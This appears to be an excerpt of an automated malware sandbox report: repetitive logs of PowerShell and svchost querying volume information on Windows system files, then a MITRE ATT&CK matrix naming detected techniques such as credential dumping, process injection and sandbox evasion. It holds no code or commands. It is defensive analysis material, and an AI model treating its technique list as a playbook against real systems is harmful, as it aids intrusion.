      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
